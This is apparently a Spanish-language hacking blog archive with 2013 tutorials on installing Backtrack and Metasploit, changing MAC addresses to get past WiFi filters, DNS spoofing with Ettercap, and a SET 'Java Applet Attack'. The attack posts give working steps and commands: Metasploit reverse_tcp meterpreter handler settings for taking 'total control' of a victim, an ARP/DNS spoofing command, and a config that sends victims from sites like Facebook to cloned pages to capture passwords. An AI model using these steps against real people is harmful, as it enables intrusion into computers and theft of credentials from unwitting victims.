Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas

domingo, 10 de noviembre de 2013

¿Nunca quisiste tener Backtrack como tu Sistema Operativo Principal y aprovechar toda la potencia de tu ordenador?  Instala cualquier distribución de Backtrack en tu ordenador directamente en tu disco duro como tu sistema operativo principal (sin windows) en muy pocos pasos. Certificado por el equipo de Backtrack Oficial!

bACKTRACK


NOTA: Este método de instalación es el mas sencillo y mas rapido. Una vez instalado, ten en cuenta que el sistema Backtrack reemplazara por completo a Windows o a tu sistema operativo anterior. 

Requisitos:

  • Descargar el ISO de Backtrack original AQUÍ 
  • Disponer de alguna forma para bootear Backtrack en nuestro ordenador desde la BIOS. La opción mas fácil es desde un PenDrive USB, aquí te mostramos como hacerlo: Como Instalar Backtrack en Memoria USB
Instrucciones: 
  1. Booteamos Backtrack desde nuestro USB como explicamos en el tutorial mas arriba y una vez booteado, tipeamos "startx" (sin comillas) para acceder a la interfaz grafica.
  2. Una vez dentro de la interfaz grafica, nos dirigimos a escritorio y ejecutamos el archivo “install.sh”. Si no lo encontramos podemos abrir la consola y ejecutamos el comando: “ubiquity”.
  3. A continuación nos aparecerá una ventana similar a la de arriba. Aquí lo que debemos hacer es indicar nuestra ubicación geográfica y el layout de nuestro teclado.                         
  4. Ahora nos va a pedir que seleccionemos la partición donde vamos a instalar Backtrack pero como lo queremos instalar en todo el disco, le damos a "Use entire disk"
  5. Le damos a continuar y procedemos con l instalacion. Una vez terminada, el sistema se reiniciara y cuando vuelva a arrancar, nospedira un usuario y contraseña, y para ello utilizareemos: root como usuario y toor como contraseña:
  6. LISTO! Ahora ya tenemos Backtrack instalado completamente en nuestro ordenador.



jueves, 7 de marzo de 2013

Como todos sabemos, MetaSploit viene por defecto instalado en Backtrack, y como instalar solo MetaSploit era bastante complicado aquí les traigo un tutorial para instalar Backtrack 5 en Android


TUTORIAL AQUÍBacktrack 5 en Android Tutorial

miércoles, 6 de marzo de 2013

Java Applet Attack es uno de mis ataques preferidos. Es muy efectivo y discreto pero lo que mas me gusta de el es lo fácil que es llevarlo a cabo. Solo necesitas tener Backtrack y tener instalado solo 2 aplicaciones: SET y MetaSploit


Java applet Attack afecta:
  • Windows Systems
  • Linux Systems and
  • Mac OS X
Instrucciones:

1. Primero ejecutamos la aplicacion SET yendo a: Applications >> BackTrack >> Exploitation Tools >> Social Engineering Tools >> Social Engineering Toolkits >> SET                                      



    2. Una vez iniciado SET, elegimos la opción 2) Website Attack Vector. Para ello ponemos 2 y le damos a enter.
      3. Ahora nos aparecerá otro menú como el de la imagen de abajo en el que seleccionaremos la opción 1) Java Applet Attack Method (de la misma manera que el paso anterior reemplazando el 2 por el 1)     

                                                                                    
        4. A continuación aparecerá otro menú en el que seleccionaremos la opción 2) Site Cloner  

                                       


          5. Ahora tendremos que introducir la pagina que queremos clonar para que sea nuestra pagina infectada. Podemos introducir cualquiera por ejemplo: www.apk-hacks.blogspot.com     

            

          6. El siguiente paso consiste en elegir que Payload vamos a utilizar, en este caso vamos a seleccionar la siguiente:                                


          7. A continuacion vamos a tener que elegir que metodo de encripcion vamos a querer. Nosotros vamos a usar 16) Backdoor Executable (BEST)


          8. Lo siguiente va a ser elegir el puerto que queramos utilizar. (podemos darle directamente a enter para que SET elija el puerto)


          9. Una vez seleccionado el puerto, SET iniciara MetaSploit


          10. Una vez iniciado MetaSploit tendremos que ejecutar los siguientes comandos:

          • use exploit/multi/handler
          • set payload windows/meterpreter/reverse_tcp (para ataques a Windows)
          • set payload linux/x86/shell/reverse_tcp (para ataques a Linux)
          • set LHOST "nuestra ip local"
          • set LPORT "puerto que querramos utilizar"
          • set ExitOnSession false
          • exploit -j


          11. Ahora lo unico que nos queda es hacer que nuestra victima entre a nuestra pagina infectada, para eso podemos utilizar Ettercap para rediccionar cualquier pagina, por ejemplo: www.facebook.com , a nuestra pagina infectada que sera la indicada en la imagen superior. Para saber como hacerlo lee DNS Spoofing con Ettercap en Backtrack Tutorial

          12. Una vez que logramos que nuestra victima entre a nuestra pagina infectada, se le solicitará en una pequeña ventana que ejecute una aplicación de Java que requiere el sitio infectado, el cual la victima desconoce, por lo tanto el %99 de las personas la ejecutara. Cuando la victima le da a ejecutar, automáticamente se conecta a el ordenador del atacante proporcionándole control total de la victima.



          13. Asi se vera cuando la victima haya caído en nuestra trampa:



          14. Como vimos en la imagen anterior, se creo una sesion cuando recivimos la conexion de la victima. Lo que debemos hacer ahora para tomar el control de esa sesion es ejecutar el siguiente comando:
          • session -i 1



















          martes, 5 de marzo de 2013

          Macchanger es una aplicación muy util para cambiar nuestra dirección MAC de la placa de red. Esto se puede utilizar para muchas cosas pero la mas conocida y popular es para acceder a redes WiFi con filtro MAC.


          GNU / Linux:

          1. Lo primero que tenemos que hacer es descargar la aplicación macchanger. Para eso nos dirigimos a terminal y introducimos el siguiente comando:  apt-get install macchanger
          2. Una vez instalado, tenemos que averiguar nuestra interfaz de red, para ello ejecutamos el siguiente comando: airmon-ng
              3.   Aquí tendremos que buscar la interfaz que este en uso en nuestro ordenador, para ello nos fijamos cual de ellas tiene asociada nuestra ip local. En mi caso, como ven en la imagen de arriba, la mía es eth0 (si la tuya es diferente reemplaza eth0 por tu interfaz en los pasos que siguen)
             4.   Una vez obtenida nuestra interfaz de red, procederemos a cambiar nuestra dirección MAC. Para ello ejecutamos los siguientes comandos: (igual que en la imagen de arriba)
          • ifconfig eth0 down 
          • macchanger --mac 00:00:00:00:00:00 (introducir la MAC que queramos tener)
          • ifconfig eth0 up


             5.   Listo! Ahora, para comprobar que funciono ejecuta: ifconfig y comprueba el resultado

          Windows:

          1. Para cambiar nuestra dirección MAC en windows usaremos un programa llamado "Windows MAC Address Changer".
          2. Una vez descargado, lo instalamos y seguimos los pasos a continuación:
          3. Primero seleccionamos nuestra Interfaz de Red: 
          4. Le damos a "Change" y nos llevara al la siguiente pagina 
          5. Seleccione su sistema operativo (si su sistema operativo Windows no está en la lista a continuación, sólo tienes que seleccionar "Windows XP") 
          6. Ahora introducimos la dirección MAC que queramos tener y le damos a "Apply". Para que los cambios tengan efecto tenemos que reiniciar el equipo o desactivar y activar las Conecciones de Red


          martes, 26 de febrero de 2013

             Metasploit Es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.

          Requerimientos para instalar Metasploit en Windows (7, Vista, XP):

          Instalación:
          1. Primero que todo debemos desactivar nuestro Firewall y nuestro Antivirus temporalmente para llevar a cabo la instalación.
          2. A continuación ejecuta el instalador de Metasploit como administrador.

               3.  Damos en Next, a continuación nos pedirá que aceptemos los términos y condiciones.
               4.  Seleccionamos los puertos que queramos que use Metasploit (asegúrate de tener ese puerto abierto) y el nombre de nuestro servidor (puede ser cualquier nombre)




               5.  Ahora lo único que queda es darle Aceptar para que Metasploit comience a instalarse.


               6.  Una vez instalado vamos a inicio y ejecutamos Metasploit Console. Y Listo! ya deberías tener Metasploit Framework instalado en Windows! Suele tardar unos minutos en arrancar... no te preocupes, es normal.


          • Ante cualquier duda no dudes en comentar!









          domingo, 24 de febrero de 2013

             DNS Spoofing es un ataque que consiste en que el atacante funcione como intermediario entre el punto de acceso de la red (router) y la victima que tiene que obviamente, tiene que estar conectada a la misma red que el atacante. Al funcionar como intermediario, lo que hacemos es redireccionar peticiones especificas o todas, a la dirección que nosotros queramos. Este método es útil para poder llevar a cabo otros hacks como phishing, Java applet attack, etc. Ejemplo: la victima solicita la pagina www.facebook.com y el atacante tiene la posibilidad de redireccionar esa petición a un servidor local por ejemplo: 192.168.0.104:8080 donde tenemos alojado una página similar a Facebook modificada para guardar las contraseñas que la victima introduzca. 
          • Backtrack
          • Ettercap (viene instalado en backtrack)
          • Primero que todo, vamos a terminal y ejecutamos el comando " locate etter.dns ", a continuación nos mostrará la ruta de donde se encuentra el archivo etter.dns el cual contiene las especificaciones de Ettercap. Ahora lo que haremos sera abrir este archivo con un editor de texto, borrar todo e incluir las siguientes lineas:
          • En este caso, con esta configuración todas las peticiones de la pagina de Microsoft, serán redireccionadas a 198.182.196.56. Ustedes deberían poner en lugar de las direcciones de Microsoft, la dirección de la pagina que ustedes desean que sea redireccionada a otra, en este caso 198.182.196.56 la cual ustedes deberian sustituir por la direccion que ustedes deseen.
          1. Ejecutamos el comando: " ettercap -i wlan0 -T -q -P dns_spoof -M ARP:remote // // " y lo único que nos queda es esperar hasta que cargue los complementos y listo! ya debería estar funcionando tu DNS Spoofing.
          • Donde wlan0 es la interfaz de red. ( en su caso puede ser diferente, para averiguarlo ejecuta el comando " ifconfig " )



          Requerimientos:
          Instrucciones:
          microsoft.com            A 198.182.196.56
          *.microsoft.com         A 198.182.196.56
          www.microsoft.com    A 198.182.196.56
          -Mediante comandos:






          miércoles, 20 de febrero de 2013

            ¿Nunca te preguntaste si podías instalar Backtrack 5 junto con Windows? 
          Ahora te enseñaremos como hacerlo, y para ello utilizaremos una herramienta muy conocida: Unetbootin. 
          Unetbootin es una software multiplataforma que permite la instalación de varias distribuciones GNU/Linux desde una memoria USB o desde un disco duro USB.


          Requerimientos: 
          • Ordenador con Windows instalado (7,XP,Vista)
          • El ISO de Backtrack que puedes descargar
          • Unetbootin el cual puedes descargar
          1. Una vez descargados los archivos, ejecuta Unetbootin.
              2. Ahora selecciona la opción Diskimage como en la imagen de arriba y selecciona el ISO de Backtrack.
              3. En la opción "Type" selecciona Hard Drive y selecciona el disco C.
              4. A continuación presiona OK y espera hasta que se complete la instalación.(suele tardar unos minutos)
              5. Una vez completada la instalación reinicia el ordenador, cuando arranque Selecciona Unetbootin y a continuación, en unos segundos ya estarás disfrutando de Backtrack instalado junto con Windows en tu ordenador.

              6. Selecciona Unetbootin y a continuación, en unos segundos ya estarás disfrutando de Backtrack instalado junto con Windows en tu ordenador.

          • ¿Tienes una duda? no dudes en comentar!